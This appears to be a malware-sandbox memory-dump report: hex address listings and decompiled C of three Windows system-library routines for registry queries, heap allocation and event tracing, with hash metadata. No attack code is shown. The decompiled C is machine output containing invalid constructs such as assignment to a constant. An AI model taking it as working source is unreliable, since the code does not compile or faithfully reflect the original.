0x03686ee1
0x03686ee8
0x03686eeb
0x03686eed
0x03686ef0
0x03686ef4
0x03686ef8
0x03686efc
0x00000000
0x00000000
0x03686f0d
0x03686f11
0x03686f32
0x03686f37
0x03686f3b
0x03686f3e
0x03686f41
0x03686f46
0x00000000
0x00000000
0x03686f4c
0x03686f50
0x03686f50
0x03686f54
0x03686f62
0x03686f65
0x03686f6d
0x03686f7b
0x03686f7b
0x03686f93
0x03686f98
0x03686fa0
0x03686fa6
0x03686fb3
0x03686fb6
0x03686fbf
0x03686fc1
0x03686fd5
0x03686fda
0x03686fda
0x03686fdd
0x03686fe2
0x03686fe7
0x03686feb
0x03686fef
0x03686ff3
0x0364520c
0x0364520c
0x0364520f
0x03645215
0x03645234
0x0364523a
0x0364523a
0x03645244
0x03645245
0x03645246
0x03645251
0x03645251
0x03686f13
0x03686f17
0x03686f17
0x03686f18
0x03686f1b
0x03686f1f
0x03686f23
0x00000000
0x03686f28
0x03645204
0x03645204
0x03645208
0x00000000
0x03645208
0x03645185
0x03645188
0x0364518a
0x0364518e
0x03645195
0x03686db1
0x03686db5
0x03686db9
0x0364519b
0x0364519b
0x0364519e
0x036451a7
0x036451a9
0x036451a9
0x036451b5
0x036451b8
0x036451bb
0x036451be
0x036451c1
0x036451c5
0x036451c9
0x036451cd
0x036451cd
0x036451d8
0x036451dc
0x036451e0
0x03686dcc
0x03686dd0
0x03686dd5
0x03686ddd
0x03686de1
0x03686de1
0x03686de5
0x03686deb
0x03686df1
0x03686df7
0x03686dfd
0x03686e01
0x03686e05
0x03686e09
0x03686e0d
0x03686e11
0x03686e11
0x036451eb
0x03686e1a
0x03686e1f
0x03686e21
0x03686e23
0x00000000
0x036451f1
0x036451f1
0x00000000
0x036451f1

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4703a3967383a4d0042cae24436189e563371c6ff85b0ae00ecac4afe64a32e
Instruction ID: 3d8c945400e33d0538aefba4cbd9564ac353679096da3ec8b06dc877a31f7ced
Opcode Fuzzy Hash: b4703a3967383a4d0042cae24436189e563371c6ff85b0ae00ecac4afe64a32e
Instruction Fuzzy Hash: 42C123755083808FD354CF28C580A5AFBF1BF89304F188A6EFA998B352D771E945CB46

Uniqueness

Uniqueness Score: -1.00%

Function 036403E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E036403E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x370d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03640548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0365B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0362B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3707c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03637D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03637D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03697016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03659830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E036969A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3707c04 != 0) {
						_t118 = _v12;
						_t120 = E0369A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3707bd8;
						if( *0x3707bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E036595D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E036599A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03693540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0361B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0365AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3708474 - 3;
										if( *0x3708474 != 3) {
											 *0x37079dc =  *0x37079dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03637D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03637D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03697016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3708708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3707b00; // 0x0
							asm("ror esi, cl");
							 *0x370b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E036595D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03627F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x036403f1
0x036403f7
0x036403f9
0x036403fb
0x036403fd
0x03640400
0x0364040a
0x03684c7a
0x03640537
0x03640547
0x03640410
0x03640410
0x03640414
0x03640417
0x0364041a
0x03640421
0x03640424
0x0364042b
0x0364043b
0x0364043e
0x0364043f
0x0364043f
0x03640446
0x03640449
0x0364044c
0x0364044f
0x03640459
0x03684c8d
0x0364045f
0x0364045f
0x0364045f
0x03640467
0x03684c97
0x03684c9d
0x03684ca4
0x03684caa
0x03684caf
0x03684cb1
0x03684cc3
0x03684cb3
0x03684cbc
0x03684cbc
0x03684cc8
0x03684ccb
0x03684cd7
0x03684cda
0x03684cdf
0x03684cdf
0x03684ccb
0x03684ca4
0x0364046d
0x0364046f
0x0364046f
0x03640471
0x03640476
0x0364047a
0x0364047b
0x03640483
0x03640489
0x0364048d
0x00000000
0x00000000
0x03684ce9
0x03684cef
0x03684d22
0x03684d22
0x00000000
0x03684d22
0x03684cf1
0x03684cf7
0x00000000
0x00000000
0x03684cf9
0x03684cff
0x00000000
0x00000000
0x03684d05
0x03684d07
0x00000000
0x00000000
0x03684d0d
0x03684d0f
0x03684d14
0x03684d16
0x00000000
0x00000000
0x03684d1c
0x03684d1c
0x03640499
0x03640535
0x03640535
0x00000000
0x03640535
0x036404a6
0x03684d2c
0x03684d37
0x03684d39
0x03684d3b
0x00000000
0x00000000
0x03684d41
0x03684d48
0x03640527
0x0364052b
0x0364052d
0x03640530
0x03640530
0x00000000
0x0364052b
0x03684d4e
0x036404ac
0x036404ac
0x036404af
0x036404b2
0x036404b7
0x036404b9
0x036404bb
0x036404bd
0x036404bf
0x036404c5
0x036404c9
0x03684d53
0x03684d59
0x03684db9
0x03684dba
0x03684dbf
0x03684dc2
0x03684dc4
0x03684dc7
0x03684dce
0x00000000
0x03684dce
0x03684d5b
0x03684d61
0x00000000
0x00000000
0x03684d63
0x03684d69
0x00000000
0x00000000
0x03684d6b
0x03684d6e
0x03684d74
0x03684d76
0x03684d7c
0x03684d7e
0x03684d84
0x03684d89
0x03684d8c
0x03684d8d
0x03684d92
0x03684d95
0x03684d96
0x03684d98
0x03684d9a
0x03684d9f
0x03684da4
0x03684da6
0x03684da8
0x03684daf
0x03684db1
0x03684db1
0x03684daf
0x03684da6
0x03684d84
0x03684d7c
0x00000000
0x03684d74
0x036404d6
0x03684de1
0x036404dc
0x036404dc
0x036404dc
0x036404e4
0x03684deb
0x03684df1
0x03684df8
0x03684dfe
0x03684e03
0x03684e05
0x03684e17
0x03684e07
0x03684e10
0x03684e10
0x03684e1c
0x03684e1f
0x03684e35
0x03684e35
0x03684e1f
0x03684df8
0x036404f1
0x036404fa
0x03684e3f
0x03684e47
0x03684e5b
0x03684e61
0x03684e67
0x03684e69
0x03684e71
0x03684e73
0x03640500
0x03640500
0x03640500
0x036404fa
0x03640508
0x0364051d
0x0364051d
0x0364051f
0x03640524
0x00000000
0x03640524
0x03640515
0x03640517
0x03684e7a
0x03684e7c
0x00000000
0x00000000
0x03684e85
0x00000000
0x03684e85
0x00000000
0x03640517

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bffb26fbf4dd5ad03cdab501ee8adfec96372208577a6ba239d35f0c2d06e6f
Instruction ID: 718a35f6c9acd441806456cffcaaec2c6506ab92d4dbaa529f3066846b0ad5a1
Opcode Fuzzy Hash: 4bffb26fbf4dd5ad03cdab501ee8adfec96372208577a6ba239d35f0c2d06e6f
Instruction Fuzzy Hash: A5914C71E00325DFDB22EB69D944BADFBA8EB05728F090365EA10AB3D0DB749D00C795

Uniqueness

Uniqueness Score: -1.00%

Function 0361C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0361C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x370d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03626D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0365B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3707b9c; // 0x0
					_t74 = L03634620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03659650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L036377F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0365F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E036513C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L036377F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03659650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0361c608
0x0361c615
0x0361c625
0x0361c62d
0x0361c635
0x0361c640
0x0361c680
0x0361c687
0x0361c688
0x0361c689
0x0361c694
0x0361c694
0x0361c642
0x0361c64a
0x0361c697
0x03687a25
0x03687a2b
0x03687a2e
0x03687a30
0x03687bea
0x03687bea
0x00000000
0x03687bea
0x03687a36
0x03687a43
0x03687a48
0x03687a4c
0x03687a4e
0x00000000
0x00000000
0x03687a58
0x03687a5a
0x03687a5b
0x03687a5c
0x03687a5d
0x03687a63
0x03687a64
0x03687a6a
0x03687a6c
0x03687a6e
0x036879cb
0x036879cb
0x036879ce
0x036879d0
0x03687a98
0x03687a9b
0x03687a9b
0x03687a9e
0x03687aa1
0x03687bbe
0x03687bbe
0x03687bc0
0x03687be0
0x03687be0
0x03687a01
0x03687a01
0x03687a05
0x03687a07
0x03687a15
0x03687a15
0x03687a1a
0x00000000
0x03687a1a
0x03687bc2
0x03687bc6
0x03687bc9
0x03687bcd
0x03687bcf
0x036879e6
0x036879e6
0x036879eb
0x036879eb
0x036879ef
0x036879f1
0x00000000
0x00000000
0x036879f3
0x036879f5
0x036879ff
0x036879ff
0x00000000
0x036879ff
0x036879f7
0x036879fd
0x00000000
0x00000000
0x00000000
0x036879fd
0x03687bd5
0x03687bd8
0x00000000
0x00000000
0x03687ba9
0x03687bac
0x03687bb0
0x03687bb1
0x03687bb1
0x03687bb6
0x00000000
0x03687bb6
0x03687aa7
0x03687aaa
0x00000000
0x00000000
0x03687ab2
0x03687ab3
0x03687ab5
0x03687aec
0x03687aef
0x03687b25
0x03687b28
0x03687b62
0x03687b64
0x03687b8f
0x03687b92
0x03687b96
0x03687b98
0x00000000
0x00000000
0x03687b9e
0x03687b9f
0x03687ba3
0x00000000
0x03687ba3
0x03687b66
0x03687b68
0x03687ae2
0x03687ae2
0x00000000
0x03687ae2
0x03687b6e
0x03687b72
0x03687b75
0x03687b81
0x03687b85
0x03687b87
0x00000000
0x00000000
0x03687b31
0x03687b34
0x03687b3c
0x03687b45
0x03687b46
0x03687b4f
0x03687b51
0x03687b57
0x03687b59
0x03687b59
0x00000000
0x03687b59
0x03687b77
0x00000000
0x03687b77
0x03687b2a
0x00000000
0x03687b2a
0x03687af1
0x03687af3
0x00000000
0x00000000
0x03687afb
0x03687afc
0x03687afe
0x00000000
0x00000000
0x03687b00
0x03687b03
0x00000000
0x00000000
0x03687b05
0x03687b09
0x03687b0d
0x03687b0f
0x00000000
0x00000000
0x03687b18
0x03687b1d
0x00000000
0x03687b1d
0x03687ab7
0x03687ab9
0x00000000
0x00000000
0x03687abf
0x03687ac1
0x00000000
0x00000000
0x03687ac3
0x03687ac6
0x00000000
0x00000000
0x03687ac8
0x03687acc
0x03687ad0
0x03687ad2
0x00000000
0x00000000
0x03687adb
0x00000000
0x03687adb
0x036879d6
0x036879d9
0x036879dc
0x03687a91
0x03687a94
0x00000000
0x03687a94
0x036879e2
0x00000000
0x036879e2
0x03687a74
0x03687a7a
0x00000000
0x00000000
0x03687a8a
0x03687a21
0x03687a21
0x00000000
0x03687a21
0x0361c650
0x0361c651
0x0361c656
0x0361c65c
0x0361c65d
0x0361c663
0x0361c664
0x0361c66a
0x0361c66e
0x036879c5
0x036879c7
0x00000000
0x036879c7
0x0361c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03a761244f217adbfb00b36e90cf2f3141e94f0784fbef8d44aaa5db02cc0619
Instruction ID: 24b9d34d8ede79f9ade84d1d1890b5d019cf1bb2cf7e01b0f76854337500d1c7
Opcode Fuzzy Hash: 03a761244f217adbfb00b36e90cf2f3141e94f0784fbef8d44aaa5db02cc0619
Instruction Fuzzy Hash: A9819276644305CBCB25EF18C980A6AB7E9FB8C354F284A6EED459B340D371ED41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03696DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E03696DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03696B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03637D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03659AE0();
					_t87 = L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0369795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0369795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0369795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0369795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03634620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03696B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03696B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03696B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03696B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03637D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03659AE0();
								L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03632400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03632400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03632400( &_v52);
							}
							if(_v28 >= 0) {
								return L03632400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x03696dd4
0x03696dde
0x03696de1
0x03696de3
0x03696de6
0x03696de9
0x03696dec
0x03696def
0x03696df2
0x03696df5
0x03696dfe
0x03696e04
0x03696e09
0x03696e0d
0x03696e18
0x03696e1b
0x03696e22
0x03696e2d
0x03696e30
0x03696e36
0x03696e42
0x03696e4d
0x03696e50
0x03696e55
0x03696e5c
0x03696e6e
0x03696e5e
0x03696e67
0x03696e67
0x03696e73
0x03696e74
0x03696e77
0x03696e7c
0x03696e7d
0x03696e8e
0x03696e93
0x03696e9c
0x03696ea8
0x03696eab
0x03696eac
0x03696eb3
0x03696ecd
0x03696edc
0x03696ee2
0x03696ee5
0x03696ef2
0x03696efb
0x03696f01
0x03696f06
0x03696f0b
0x03696f11
0x03696f1a
0x03696f22
0x03696f26
0x03696f26
0x03696f33
0x03696f41
0x03696f44
0x03696f47
0x03696f54
0x03696f65
0x03696f77
0x03696f7c
0x03696f82
0x03696f91
0x03696f99
0x03696fa3
0x03696fae
0x03696fae
0x03696fba
0x03696fbb
0x03696fbc
0x03696fc1
0x03696fc2
0x03696fd3
0x03696fd8
0x03696fd8
0x03696fdf
0x03696fe8
0x03696fee
0x03696fee
0x03696ff5
0x03696ffb
0x03696ffb
0x03697004
0x00000000
0x0369700a
0x03697004
0x03696eb3
0x03696e9c
0x03697015

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 42bbf24a0609a856257d892cbce95dbcb4672ab2c10c7b3d1fee26fb8b1be7a2
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
